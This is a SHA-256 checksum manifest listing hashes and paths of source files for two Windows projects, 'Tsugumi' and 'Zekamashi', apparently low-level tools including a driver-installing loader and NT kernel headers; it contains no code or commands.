-68ad6e92cee032d4520f7cbed43d8fd83f723b23ecec8c9205573f54d35d45e6 *Source\Tsugumi\Tsugumi.sln
-969b0d8d22f6d7141693c69de4a3e177f81ce4b00e208b394bf04cd4483d0580 *Source\Tsugumi\Tsugumi.vcxproj
-42c47537b741a1c0da5b0fca62fc78f075db5eb926895391ebdbd9ef7d90c963 *Source\Tsugumi\Tsugumi.vcxproj.filters
-0f519e8924cd229593110649cd62a153550e8cd0acc84966911dcae6ea65f558 *Source\Tsugumi\Tsugumi.vcxproj.user
-cab07b300adda57e34fcec37b6e6918008a2f5281dc965cffff7e5ba68aad676 *Source\Zekamashi\Zekamashi.sln
-27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f *Source\Zekamashi\loader\cui.c
-3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9 *Source\Zekamashi\loader\cui.h
-3381a5cf4a0e7817b7c6e99592347d219e13954b01ff1813da5b3d6d27ebd633 *Source\Zekamashi\loader\global.h
-3e1494f39e2bfb576470f7174742a6dae5e34bafb04c902f85c1e50f5295f0da *Source\Zekamashi\loader\instdrv.c
-f6d8ae79a0b7f196618503788ddb665e2302add590aa5815189ce4b375d11a59 *Source\Zekamashi\loader\instdrv.h
-9c461f8c39226e1bdae9ca91e07c88000c8b299f0be4e292f8e974f3bb00d330 *Source\Zekamashi\loader\loader.vcxproj
-d8c8c4cff592311316f51947a8df0818b94b424103b9801f18cd3360bc58f2fd *Source\Zekamashi\loader\loader.vcxproj.filters
-27d6b45180900506501980eee88bbc891c38a428881c4f3a36a18f520063b360 *Source\Zekamashi\loader\loader.vcxproj.user
-7c12321485f246c80fca85b851cbd9d5be684e39023ccc3faff04bfa9709cd80 *Source\Zekamashi\loader\main.c
-d0debd4f7db2ef941f0b02e9d7d1b85d873f0a01dcb4537b5e112c68443aaaa6 *Source\Zekamashi\loader\ntos.h
-df328b27c089423e589264fe5ed1c48c4de258facda4124ba4bc18378bfa04e1 *Source\Zekamashi\loader\oscompat.manifest
-4704f99a4a33ff7346e525891ea6049152b73cf51774a17d00b15e3a4cb95dbd *Source\Zekamashi\loader\patterns.c
-f63ccabb9ba7d04668d1255a263aa2909649eb3d402f5bde6f061a133de24155 *Source\Zekamashi\loader\patterns.h
-73adf98a7a275942811192166eca735dd785771cc29b29869f8a3e57b2f61f88 *Source\Zekamashi\loader\resource.h
-34e5342682909edba6d016019d563cdb2d525eafb0607203529248578af8f3d0 *Source\Zekamashi\loader\Resource.rc
-3ffbabc49a7d0eb44236a16d6a1c15c70b1068ab4084765d594e3b02abf7cdf8 *Source\Zekamashi\loader\sup.c
-0f94b41d2298f294be51ca6219c19c0bbb1eea12d12f86bb5a92fee8d3a1345e *Source\Zekamashi\loader\sup.h
-28eae019e74dfd55cb5a86e3fa6cb87779ea70bfa281f6593a809b63858019eb *Source\Zekamashi\loader\minirtl\cmdline.c
-a108a76d0b5113772c20f7329eaeac490dab2f9ce0b7beaeea5fe80bbdb041cf *Source\Zekamashi\loader\minirtl\cmdline.h
-757523eaa1838f873e41bdeea69c839d21aa8a8e0c96c1918121ea86a222267f *Source\Zekamashi\loader\minirtl\minirtl.h
-82bdda67972f1b07b8c486208cf782f2a75e8efab0eb66c089e64f03b35aeb77 *Source\Zekamashi\loader\minirtl\rtltypes.h
-040c2d4f9bb0d0e719682a1dc4cc06a528d8bb984aaf89e975eded16d7639586 *Source\Zekamashi\loader\minirtl\u64tohex.c
-84d395d7077527cdf4b4bc56c59038174c4cc0772ca6c733553de7ee18f9c045 *Source\Zekamashi\loader\minirtl\u64tostr.c
-d0c65008262381fd065ba8c364cfa5cf8b471c363bf385e3a468fa53945af918 *Source\Zekamashi\loader\minirtl\ultohex.c
-c902616e5949b38a2700741c775417f9a52270a469864d9ef033664682bdc458 *Source\Zekamashi\loader\minirtl\_strcat.c
-1e903e3ac78a19475b485f6408d455f6258ee8f1f3a5d3b2e8b4c972bd32bc00 *Source\Zekamashi\loader\minirtl\_strcmpi.c
-43c13acfea0213bc1651f11f42d55f2830447e149ad6176326ba8226e4c9d3e6 *Source\Zekamashi\loader\minirtl\_strcpy.c
-9fa6411f94c8a3866b887823569337bdb29796056f8cadb89791d84933d6861c *Source\Zekamashi\loader\minirtl\_strend.c
-213f8bc30a76ead3c8a60b61cc46c76a873f06f7c0bb473effeb584a6588a308 *Source\Zekamashi\loader\minirtl\_strlen.c